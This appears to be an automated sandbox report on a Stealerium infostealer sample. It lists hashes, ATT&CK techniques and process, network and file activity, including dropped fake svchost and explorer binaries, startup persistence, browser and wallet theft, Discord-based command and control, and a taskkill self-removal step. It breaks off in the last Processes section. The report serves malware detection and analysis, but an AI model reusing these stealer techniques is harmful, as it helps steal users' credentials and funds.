Malware Analysis Report

2024-08-06 12:42

Sample ID 240507-temwqadg5x
Target zezzy_builder.exe
SHA256 fbb40094f45878374ef62cee6e3e66f3e36922a59ab088a6b3a0b0b50974cd1f
Tags
pyinstaller stealerium stealer spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

fbb40094f45878374ef62cee6e3e66f3e36922a59ab088a6b3a0b0b50974cd1f

Threat Level: Known bad

The file zezzy_builder.exe was found to be: Known bad.

Malicious Activity Summary

pyinstaller stealerium stealer spyware

Stealerium family

Stealerium

Loads dropped DLL

Checks computer location settings

Reads user/profile data of web browsers

Drops startup file

Executes dropped EXE

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Detects Pyinstaller

Enumerates physical storage devices

Unsigned PE

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

Modifies registry class

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Privilege Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Unsecured Credentials
T1552
Credentials In Files
T1552.001
Discovery
TA0007
System Information Discovery
T1082
Query Registry
T1012
Lateral Movement
TA0008
Collection
TA0009
Data from Local System
T1005
Exfiltration
TA0010
Command and Control
TA0011
Web Service
T1102
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-05-07 15:58

Signatures

Stealerium family

stealerium

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-07 15:58

Reported

2024-05-07 15:59

Platform

win10v2004-20240426-en

Max time kernel

36s

Max time network

40s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\cstealer.pyc

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\cstealer.pyc

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.155:443 www.bing.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 155.61.62.23.in-addr.arpa udp
NL 23.62.61.155:443 www.bing.com tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 43.56.20.217.in-addr.arpa udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-07 15:58

Reported

2024-05-07 15:59

Platform

win7-20240221-en

Max time kernel

15s

Max time network

17s

Command Line

"C:\Users\Admin\AppData\Local\Temp\zezzy_builder.exe"

Signatures

Stealerium

stealer stealerium

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\zezzy_builder.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\zezzy_builder.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2836 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\zezzy_builder.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2836 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\zezzy_builder.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2836 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\zezzy_builder.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2836 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\zezzy_builder.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2836 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\zezzy_builder.exe C:\Users\Admin\AppData\Local\Temp\explorer.exe
PID 2836 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\zezzy_builder.exe C:\Users\Admin\AppData\Local\Temp\explorer.exe
PID 2836 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\zezzy_builder.exe C:\Users\Admin\AppData\Local\Temp\explorer.exe
PID 2836 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\zezzy_builder.exe C:\Users\Admin\AppData\Local\Temp\explorer.exe
PID 2292 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe C:\Users\Admin\AppData\Local\Temp\explorer.exe
PID 2292 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe C:\Users\Admin\AppData\Local\Temp\explorer.exe
PID 2292 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe C:\Users\Admin\AppData\Local\Temp\explorer.exe
PID 2172 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SysWOW64\cmd.exe
PID 2172 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SysWOW64\cmd.exe
PID 2172 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SysWOW64\cmd.exe
PID 2172 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SysWOW64\cmd.exe
PID 2352 wrote to memory of 564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2352 wrote to memory of 564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2352 wrote to memory of 564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2352 wrote to memory of 564 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2352 wrote to memory of 1132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2352 wrote to memory of 1132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2352 wrote to memory of 1132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2352 wrote to memory of 1132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2352 wrote to memory of 1788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2352 wrote to memory of 1788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2352 wrote to memory of 1788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2352 wrote to memory of 1788 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe

Processes

C:\Users\Admin\AppData\Local\Temp\zezzy_builder.exe

"C:\Users\Admin\AppData\Local\Temp\zezzy_builder.exe"

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\explorer.exe

"C:\Users\Admin\AppData\Local\Temp\explorer.exe"

C:\Users\Admin\AppData\Local\Temp\explorer.exe

"C:\Users\Admin\AppData\Local\Temp\explorer.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp4FBE.tmp.bat

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\taskkill.exe

TaskKill /F /IM 2172

C:\Windows\SysWOW64\timeout.exe

Timeout /T 2 /Nobreak

Network

Country Destination Domain Proto
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp

Files

memory/2836-0-0x000000007429E000-0x000000007429F000-memory.dmp

memory/2836-1-0x0000000000C80000-0x000000000196E000-memory.dmp

\Users\Admin\AppData\Local\Temp\svchost.exe

MD5 b9e0f12dac33aeacd4c95a89d3084a66
SHA1 2ad8173c61907a949e5b0c0d60064336b12583c3
SHA256 3520bdc6dd768a63a429517e4270740b514387835fe4a4918fd14cd6e47fdd24
SHA512 4c57c55123edbae3862b3b028ffb2927202558264933f8c89924185bc9199a524d5e1da81125a72d76a06110de3f76c0e682db97221ab96729df01d462dd3e52

memory/2172-10-0x0000000000860000-0x00000000009F4000-memory.dmp

\Users\Admin\AppData\Local\Temp\explorer.exe

MD5 ab2200a32cc9b4ca9482a8c5c1f02ec7
SHA1 d6bf0fdbb707003772bc26f96de35a5875846cec
SHA256 d2698f6ebf00ae0975c0f4b441381bdedfc2612f79b2fd221542bf18560aa650
SHA512 8535e7bf34aa649e7d56cba1ffc80c08f919686b88da037ef920abbbd8d602a54ebea433c85fc0a2f3948ca0ab08fbf4e9de3fe5f86326aee85cdf4f66a5bc29

memory/2172-14-0x0000000074290000-0x000000007497E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI22922\ucrtbase.dll

MD5 d7e7a4c519004d1558fcab9e9eb371a3
SHA1 133d0745f0f6f720c019c9bdcaf1a2ea6ddd21cc
SHA256 7773484bd0ecf89bec67619a38ac73167c2d8cf40613d68a773c07955bcaa94f
SHA512 07557ebf82ae51ee678fe88570f48a011bcdcbcf58504c4b51e9d0f3faf481a63d236c3c4c55c96371de1dde81e881a7fbed828e1ba11b280a9cd42ba11b7344

C:\Users\Admin\AppData\Local\Temp\_MEI22922\api-ms-win-core-file-l1-2-0.dll

MD5 5aa63c15230b86310056a7dd1d9dc82b
SHA1 c96526190b93053f7521fe48a2171644d136f68d
SHA256 13f5e092d2db88b17e3e8fc9c0cc659c7d3816c161fa276dbde6fcf8c26311ad
SHA512 9a62dde3a5d4763a28a3cb6f78b0d35525b4d5ecc51716e4f68853fbe9ef6f389d1b13f4500dbca1dc8e2891d6062c7ac70087a79aff22e004c301cfdb7e91bd

\Users\Admin\AppData\Local\Temp\_MEI22922\api-ms-win-core-localization-l1-2-0.dll

MD5 c643ebfede7ae34fa29571dc5a14a917
SHA1 820b875318de9f368c153678c71810c69c07be4f
SHA256 619143dd552b5e47f6c2fd9585d8d7b89ec34b1adce17945ea362fec986f23a9
SHA512 c1514622fe81bd36256a14030192a1d9b662157893e8cc3fc9a0519295e6d8b5dd59d7a04fdcc3f89a705e6f5b13e0f09a1b778281a361c82a74db467d3efb3e

\Users\Admin\AppData\Local\Temp\_MEI22922\api-ms-win-core-processthreads-l1-1-1.dll

MD5 43d4d038146c4be8ed2c06e1db7ba886
SHA1 1aca2239158574d810695a1942d1afabf737dcfc
SHA256 7b8da89fb25b02280a0c378a536a966bb1050d69ac25980cfd68a7483d7fa982
SHA512 3d34fb8f70772fcc0e7d7405a24fc9075002352ab4c8a3a09e15c60958ed48e4f955cec7a46aead99667b924449f16dc3d41c418044ca08bc1f9a473e0e7eb55

C:\Users\Admin\AppData\Local\Temp\_MEI22922\api-ms-win-core-timezone-l1-1-0.dll

MD5 fa86f68762f0cd75312afd7d5c47df16
SHA1 46588f341e6fec08c6439adb0351bc34340ff89e
SHA256 407e5400dbdb2df0ba00b471464ae781588ab566c3e11957cc01efad4a8e1e1b
SHA512 dc3f77ad906390bf50a7a319cb03fbfb8894515c0d0ce21c03bfd7acff1df991511f4d2f6693760b98d497b44837d1b3b0bfca72cf998dbfce8d9b4863997131

C:\Users\Admin\AppData\Local\Temp\_MEI22922\python312.dll

MD5 3c388ce47c0d9117d2a50b3fa5ac981d
SHA1 038484ff7460d03d1d36c23f0de4874cbaea2c48
SHA256 c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb
SHA512 e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

\Users\Admin\AppData\Local\Temp\_MEI22922\api-ms-win-core-file-l2-1-0.dll

MD5 11c308210b76b97471b325ab28cd4da6
SHA1 75d423531e1cb8b8ba147cd6263d2fa45321521a
SHA256 71bbc4c856aefd56a6273d5b5509cbc9389ceb99e6109342f46d55954a662abc
SHA512 0d50a2c49e5faab76dbafdffecdf9f465e0648cd68f8fb66cbb414f4cd9cd4da0ee228c46efc4cd4ee28039f463e686676e43f4f92471445fd578e8a2eff270f

memory/2172-136-0x0000000074290000-0x000000007497E000-memory.dmp

memory/2172-140-0x00000000056E0000-0x0000000005772000-memory.dmp

memory/2172-141-0x0000000000480000-0x00000000004A6000-memory.dmp

memory/2172-142-0x00000000007C0000-0x00000000007C8000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\Tar4EF2.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\Local\Temp\tmp4FBE.tmp.bat

MD5 451cec8fc99f52f19b27c3f3a87243dc
SHA1 2cdd8b837a3ceb19605279397b537202cc05c406
SHA256 ffb61f43de7f7a675545269970bdc306eae181300467da4bb93a2313cf56a3be
SHA512 5d9573749c252aace1cdf64b617836eb0df563a2737019f8c0e003cc0712ea3320d0b0e9291f4bd50add6121748310abb76300d511b2a3c6bc1cafa3ce7f34c4

memory/2172-281-0x0000000074290000-0x000000007497E000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-07 15:58

Reported

2024-05-07 15:59

Platform

win10v2004-20240419-en

Max time kernel

34s

Max time network

41s

Command Line

"C:\Users\Admin\AppData\Local\Temp\zezzy_builder.exe"

Signatures

Stealerium

stealer stealerium

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\zezzy_builder.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.exe C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 928 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\zezzy_builder.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 928 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\zezzy_builder.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 928 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\zezzy_builder.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 928 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\zezzy_builder.exe C:\Users\Admin\AppData\Local\Temp\explorer.exe
PID 928 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\zezzy_builder.exe C:\Users\Admin\AppData\Local\Temp\explorer.exe
PID 2856 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe C:\Users\Admin\AppData\Local\Temp\explorer.exe
PID 2856 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe C:\Users\Admin\AppData\Local\Temp\explorer.exe
PID 2852 wrote to memory of 868 N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe C:\Windows\system32\cmd.exe
PID 2852 wrote to memory of 868 N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe C:\Windows\system32\cmd.exe
PID 868 wrote to memory of 1168 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 868 wrote to memory of 1168 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4960 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SysWOW64\cmd.exe
PID 4960 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SysWOW64\cmd.exe
PID 4960 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SysWOW64\cmd.exe
PID 2852 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe C:\Windows\system32\cmd.exe
PID 2852 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe C:\Windows\system32\cmd.exe
PID 1320 wrote to memory of 3396 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1320 wrote to memory of 3396 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1320 wrote to memory of 3396 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3032 wrote to memory of 3640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3032 wrote to memory of 3640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1320 wrote to memory of 4400 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1320 wrote to memory of 4400 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1320 wrote to memory of 4400 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1320 wrote to memory of 4296 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1320 wrote to memory of 4296 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1320 wrote to memory of 4296 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2852 wrote to memory of 4112 N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe C:\Windows\system32\cmd.exe
PID 2852 wrote to memory of 4112 N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe C:\Windows\system32\cmd.exe
PID 4112 wrote to memory of 3188 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4112 wrote to memory of 3188 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2852 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe C:\Windows\system32\cmd.exe
PID 2852 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe C:\Windows\system32\cmd.exe
PID 3116 wrote to memory of 1104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3116 wrote to memory of 1104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2852 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe C:\Windows\system32\cmd.exe
PID 2852 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe C:\Windows\system32\cmd.exe
PID 2704 wrote to memory of 3928 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2704 wrote to memory of 3928 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2852 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe C:\Windows\system32\cmd.exe
PID 2852 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe C:\Windows\system32\cmd.exe
PID 3744 wrote to memory of 3196 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3744 wrote to memory of 3196 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe

Processes

C:\Users\Admin\AppData\Local\Temp\zezzy_builder.exe

